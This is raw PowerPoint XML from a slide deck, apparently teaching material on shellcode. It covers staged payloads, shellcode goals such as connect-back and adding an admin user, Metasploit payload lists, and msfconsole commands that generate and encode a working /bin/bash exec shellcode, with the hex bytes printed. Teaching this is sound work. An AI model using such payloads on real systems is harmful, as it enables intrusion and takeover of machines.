            </a:r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28245402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Shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH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shellcode:</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 2" descr="Black And White Computer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56" y="2124772"/>
            <a:ext cx="3163922" cy="31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lack And White Computer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97" y="1772816"/>
            <a:ext cx="4027048" cy="401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076784" y="2228095"/>
            <a:ext cx="2660192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Client Software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00993" y="2541391"/>
            <a:ext cx="1414943" cy="504056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06880" y="2600908"/>
            <a:ext cx="1330096" cy="396044"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0606"/>
          </a:solidFill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249144" y="1897102"/>
            <a:ext cx="0" cy="4372758"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln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736976" y="2604235"/>
            <a:ext cx="2464017" cy="551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5553" y="21720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Port 8080</a:t>
            </a:r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3111089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shellcode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smtClean="0"/>
              <a:t>Types of shellcode:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Self </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>contained (all in one)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Staged</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Minimal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>initial shellcode: Stager</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Stager loads stage 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Stage 1 loads Stage 2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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53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should a shellcode do?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Execute a shell (bash)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Add admin user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Download and execute more code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Connect back to attacker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6422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Generate Shellcode with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Metasploit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2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wants to code shellcode?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>There is an app for that…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>payloads:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Intel, ARM, MIPS, …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Windows, Linux, FreeBSD, …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>32/64 bit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Listen-, connect-back-, execute, add-user, …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Alphanumeric, sticky-bit, anti-IDS,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08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Shellcode: Payload List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Payloads:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>msfconsole</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" err="1" smtClean="0"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t>&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" err="1"/>
              <a:t>use</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" err="1"/>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0"/>
              <a:t>/x64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" smtClean="0"/>
              <a:t>/[TAB]</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t>/x64/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" err="1"/>
              <a:t>exec</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t>/x64/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" err="1"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" err="1"/>
              <a:t>bind_tcp</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t>/x64/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" err="1"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" err="1"/>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t>/x64/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" err="1"/>
              <a:t>shell_bind_tcp</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t>/x64/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" err="1"/>
              <a:t>shell_bind_tcp_random_port</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t>/x64/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" err="1"/>
              <a:t>shell_find_port</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t>/x64/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" err="1"/>
              <a:t>shell_reverse_tcp</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" b="1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14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Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Shellcode: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Payload Create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metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> create an exec() shellcode:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" smtClean="0"/>
              <a:t>msf </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t>&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" err="1"/>
              <a:t>use</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" err="1"/>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0"/>
              <a:t>/x64/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" err="1"/>
              <a:t>exec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> payload(exec) &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> = "/bin/bash"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> =&gt; = /bin/bash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" err="1"/>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" err="1"/>
              <a:t>exec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t>) &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" err="1"/>
              <a:t>generate</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="1600" dirty="0" smtClean="0"/>
              <a:t>"\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1600" dirty="0"/>
              <a:t>x6a\x3b\x58\x99\x48\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1600" dirty="0" err="1"/>
              <a:t>xbb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1600" dirty="0"/>
              <a:t>\x2f\x62\x69\x6e\x2f\x73\x68</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1600" b="1" dirty="0"/>
              <a:t>\x00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1600" dirty="0"/>
              <a:t>" +</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="1600" dirty="0"/>
              <a:t>"\x53\x48\x89\xe7\x68\x2d\x63\x00\x00\x48\x89\xe6\x52\xe8" +</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="1600" dirty="0"/>
              <a:t>"\x0c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1600" b="1" dirty="0"/>
              <a:t>\x00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1600" dirty="0"/>
              <a:t>\x00\x00\x3d\x20\x2f\x62\x69\x6e\x2f\x62\x61\x73" +</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="1600" dirty="0"/>
              <a:t>"\x68</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1600" b="1" dirty="0"/>
              <a:t>\x00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1600" dirty="0"/>
              <a:t>\x56\x57\x48\x89\xe6\x0f\x05"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43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Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Shellcode: Payload Create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now without null bytes:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" smtClean="0"/>
              <a:t>msf </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" err="1"/>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" err="1"/>
              <a:t>exec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t>) &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" err="1"/>
              <a:t>generate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0"/>
              <a:t> -b '\x00\x0A'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="1600" dirty="0" smtClean="0"/>
              <a:t>"\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1600" dirty="0"/>
              <a:t>x48\x31\xc9\x48\x81\xe9\xf9\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1600" dirty="0" err="1"/>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1600" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1600" dirty="0" err="1"/>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1600" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1600" dirty="0" err="1"/>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1600" dirty="0"/>
              <a:t>\x48\x8d\x05\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1600" dirty="0" err="1"/>
              <a:t>xef</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1600" dirty="0"/>
              <a:t>" +</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="1600" dirty="0"/>
              <a:t>"\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1600" dirty="0" err="1"/>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1600" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1600" dirty="0" err="1"/>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1600" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1600" dirty="0" err="1"/>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1600" dirty="0"/>
              <a:t>\x48\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1600" dirty="0" err="1"/>
              <a:t>xbb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1600" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1600" dirty="0" err="1"/>
              <a:t>xca</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1600" dirty="0"/>
              <a:t>\x7f\x48\xd1\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1600" dirty="0" err="1"/>
              <a:t>xcf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1600" dirty="0"/>
              <a:t>\x89\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1600" dirty="0" err="1"/>
              <a:t>xea</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1600" dirty="0"/>
              <a:t>\x19\x48" +</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="1600" dirty="0"/>
              <a:t>"\x31\x58\x27\x48\x2d\xf8\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1600" dirty="0" err="1"/>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1600" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1600" dirty="0" err="1"/>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1600" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1600" dirty="0" err="1"/>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1600" dirty="0"/>
              <a:t>\xe2\xf4\xa0\x44\x10" +</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="1600" dirty="0"/>
              <a:t>"\x48\x87\x32\xc5\x7b\xa3\x11\x67\xa2\xa7\x89\xb9\x51\x43" +</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="1600" dirty="0"/>
              <a:t>"\x98\x20\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1600" dirty="0" err="1"/>
              <a:t>xfc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1600" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1600" dirty="0" err="1"/>
              <a:t>xac</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1600" dirty="0"/>
              <a:t>\x89\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1600" dirty="0" err="1"/>
              <a:t>xea</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1600" dirty="0"/>
              <a:t>\x51\x43\x99\x1a\x39\xc3\x89\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1600" dirty="0" err="1"/>
              <a:t>xea</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1600" dirty="0"/>
              <a:t>" +</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="1600" dirty="0"/>
              <a:t>"\x19\xf7\x5f\x67\xb3\xa6\xe7\xc5\x7b\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1600" dirty="0" err="1"/>
              <a:t>xab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1600" dirty="0"/>
              <a:t>\x0c\x20\xd1\x99" +</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="1600" dirty="0"/>
              <a:t>"\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1600" dirty="0" err="1"/>
              <a:t>xde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1600" dirty="0"/>
              <a:t>\xa2\x90\x2c\x70\x4d\xd1\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1600" dirty="0" err="1"/>
              <a:t>xcf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1600" dirty="0"/>
              <a:t>\x89\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1600" dirty="0" err="1"/>
              <a:t>xea</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1600" dirty="0"/>
              <a:t>\x19"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8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Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> Shellcode: Payload </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Encoder</a:t>
            </a:r>
            <a:endParaRPr lang="de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Shellcode encoders:</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="1800" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" smtClean="0"/>
              <a:t>msf </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0" err="1"/>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0" err="1"/>
              <a:t>exec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0"/>
              <a:t>) &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" b="1" dirty="0" err="1"/>
              <a:t>show</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" b="1" dirty="0" err="1"/>
              <a:t>encoders</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="1100" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0" smtClean="0"/>
              <a:t>[…]	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add_sub</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0" smtClean="0"/>
              <a:t>      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/>
              <a:t>Add/Sub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alpha_mixed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0" smtClean="0"/>
              <a:t>                  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0" err="1" smtClean="0"/>
              <a:t>low</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0" smtClean="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0"/>
              <a:t>Alpha2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0" err="1"/>
              <a:t>Alphanumeric</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0" err="1"/>
              <a:t>Mixedcase</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0"/>
              <a:t>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alpha_upper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0" smtClean="0"/>
              <a:t>                  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0" err="1" smtClean="0"/>
              <a:t>low</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0" smtClean="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0"/>
              <a:t>Alpha2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0" err="1"/>
              <a:t>Alphanumeric</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0" err="1"/>
              <a:t>Uppercase</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0"/>
              <a:t>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avoid_underscore_tolower</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0" smtClean="0"/>
              <a:t>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 err="1"/>
              <a:t>Avoid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0" err="1"/>
              <a:t>underscore</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0" err="1"/>
              <a:t>tolower</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0" smtClean="0"/>
              <a:t>x86/avoid_utf8_tolower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 err="1"/>
              <a:t>Avoid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0"/>
              <a:t> UTF8/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0" err="1"/>
              <a:t>tolower</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="1100" dirty="0"/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bloxor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0" smtClean="0"/>
              <a:t>       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 err="1"/>
              <a:t>BloXor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0"/>
              <a:t> - A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0" err="1"/>
              <a:t>Metamorphic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0"/>
              <a:t> Block </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1100" dirty="0" err="1"/>
              <a:t>Based</a:t>
            </a:r>
            <a:r>
